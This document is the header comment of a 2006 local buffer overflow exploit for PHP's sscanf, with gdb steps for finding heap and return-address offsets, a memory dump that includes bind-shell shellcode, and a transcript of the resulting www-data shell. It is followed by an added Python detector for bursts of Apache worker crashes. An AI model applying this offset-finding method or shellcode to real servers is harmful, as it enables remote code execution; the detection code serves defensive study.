Hoagie php sscanf

/***********************************************************
 * hoagie_php_sscanf.php
 * PHP <= 4.4.3 / 5.1.4 local buffer overflow exploit
 *
 * howto get offsets:
 * (set $base_addr to 0x41414141)
 * # ulimit -c 20000
 * # /etc/init.d/apache restart
 * (execute script via web browser)
 * # tail /var/log/apache/error.log
 * ...
 * [Wed Aug 16 15:07:10 2006] [notice] child pid 28222 exit signal Segmentation fault (11), possible coredump in /tmp
 * ...
 * $ gdb /usr/sbin/apache /tmp/core
 * ...
 * ...
 * #0  0x40422b2d in php_sscanf_internal () from /usr/lib/apache/1.3/libphp4.so
 * (gdb) x/250 $edx
 * ...
 * 0x83ae16c:      0x41414141      0x41414141      0x41414141      0x41414141
 * 0x83ae17c:      0xdeadbabe      0x41414145      0x4141415d      0x00000001
 *                                 ^^^^^^^^^^
 *                                 start of our buffer (0x83ae180) = $base_addr
 * 0x83ae18c:      0x00000008      0x4141415d      0x0833d248      0x00000400
 * 0x83ae19c:      0x909006eb      0x90909090      0xe3f7db31      0x435366b0
 *                                                 ^^^^^^^^^^
 *                                                 start of shell code (0x83ae1a4)
 * 0x83ae1ac:      0x89534353      0x80cd4be1      0x6652c789      0x43204e68
 * 0x83ae1bc:      0xe1895366      0xd0f6efb0      0x89575150      0xcd66b0e1
 * 0x83ae1cc:      0x4366b080      0x5080cd43      0xe1895750      0xcd66b043
 * 0x83ae1dc:      0x89d98980      0x2c6fb0c3      0x80cd4930      0x51f6e241
 * 0x83ae1ec:      0x732f6e68      0x2f2f6868      0xe3896962      0xe1895351
 * 0x83ae1fc:      0xd0f6f4b0      0x414180cd      0x41414141      0x41414141
 * 0x83ae20c:      0x41414141      0x41414141      0x41414141      0x41414141
 * ...
 * (gdb) quit
 * #
 * (change $base_addr in exploit and now call url again)
 * # gdb /usr/sbin/apache /tmp/core
 * #0  0x40475e73 in _efree () from /usr/lib/apache/1.3/libphp4.so
 * (gdb) x/4w $ebp
 * 0xbfffb018:     0xbfffb038      0x40484241      0x0812a2f4      0xbfffb038
 *                                 ^^^^^^^^^^
 *                                 return address (return address location = 0xbfffb01c)
 * (change $rec_log in exploit and call url again)
 * $ telnet 127.0.0.1 20000
 * Trying 127.0.0.1...
 * Connected to localhost.
 * Escape character is '^]'.
 * id;
 * uid=33(www-data) gid=33(www-data) groups=33(www-data)
 * exit;
 * Connection closed by foreign host.
 * $
 *
 * NOTE: Because of PHP's memory allocation, this exploit depends on the filename,
 *       pathname, file content, etc. (each extra line/byte changes emalloc() behavior,
 *       and with it the heap layout and the offsets above).
 *
 * Credits: Heintz (discovered this bug)
 *          BigHawk (bind shell code)
 *          Greuff (void.at)
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
 * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
 * DAMAGE DONE USING THIS PROGRAM.
 *
 * VOID.AT Security
 * andi@void.at
 * http://www.void.at
 *
 ************************************************************/
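The Apache error_log notice the howto above reads to locate the core ("child pid ... exit signal Segmentation fault (11), possible coredump in ...") is also the trace a defender has of attempts against this bug, since tuning offsets against a heap overflow crashes worker after worker. The following is an added example, not part of the original exploit file: it parses Apache 1.3 crash notices and flags bursts of worker segfaults; the log lines are constructed, and the 5-minute window and threshold of 3 are assumptions to tune per site.

```python
import re
from collections import deque
from datetime import datetime, timedelta

# Apache 1.3 error_log child-crash notice, e.g.
# [Wed Aug 16 15:07:10 2006] [notice] child pid 28222 exit signal Segmentation fault (11), possible coredump in /tmp
CRASH_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] child pid (?P<pid>\d+) "
    r"exit signal (?P<signame>[\w ]+?) \((?P<signo>\d+)\)"
    r"(?:, possible coredump in (?P<coredir>\S+))?"
)
TS_FMT = "%a %b %d %H:%M:%S %Y"

def parse_crash(line):
    """Return a dict for an Apache child-crash notice, or None for any other line."""
    m = CRASH_RE.match(line.strip())
    if not m:
        return None
    return {
        "time": datetime.strptime(m["ts"], TS_FMT),
        "pid": int(m["pid"]),
        "signal": int(m["signo"]),
        "signame": m["signame"],
        "coredump_dir": m["coredir"],  # None when no core was written
    }

def find_crash_bursts(lines, window=timedelta(minutes=5), threshold=3):
    """Return (first_time, last_time, pids) for every window holding >= threshold
    SIGSEGV/SIGABRT worker crashes; repeated crashes are the symptom to alert on."""
    recent, alerts = deque(), []
    for line in lines:
        ev = parse_crash(line)
        if ev is None or ev["signal"] not in (6, 11):  # SIGABRT, SIGSEGV
            continue
        recent.append(ev)
        while ev["time"] - recent[0]["time"] > window:  # drop events outside the window
            recent.popleft()
        if len(recent) >= threshold:
            alerts.append((recent[0]["time"], ev["time"], [e["pid"] for e in recent]))
            recent.clear()  # one alert per burst
    return alerts

SAMPLE_LOG = [  # constructed sample lines in Apache 1.3 error_log format
    "[Wed Aug 16 15:06:55 2006] [notice] Apache/1.3.34 configured -- resuming normal operations",
    "[Wed Aug 16 15:07:10 2006] [notice] child pid 28222 exit signal Segmentation fault (11), possible coredump in /tmp",
    "[Wed Aug 16 15:08:41 2006] [notice] child pid 28230 exit signal Segmentation fault (11), possible coredump in /tmp",
    "[Wed Aug 16 15:09:03 2006] [notice] child pid 28241 exit signal Segmentation fault (11), possible coredump in /tmp",
    "[Wed Aug 16 16:30:00 2006] [notice] child pid 28310 exit signal Segmentation fault (11)",
]
```

Pairing each alert with the request log for the same minute usually identifies the script and parameters that triggered the crashes.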
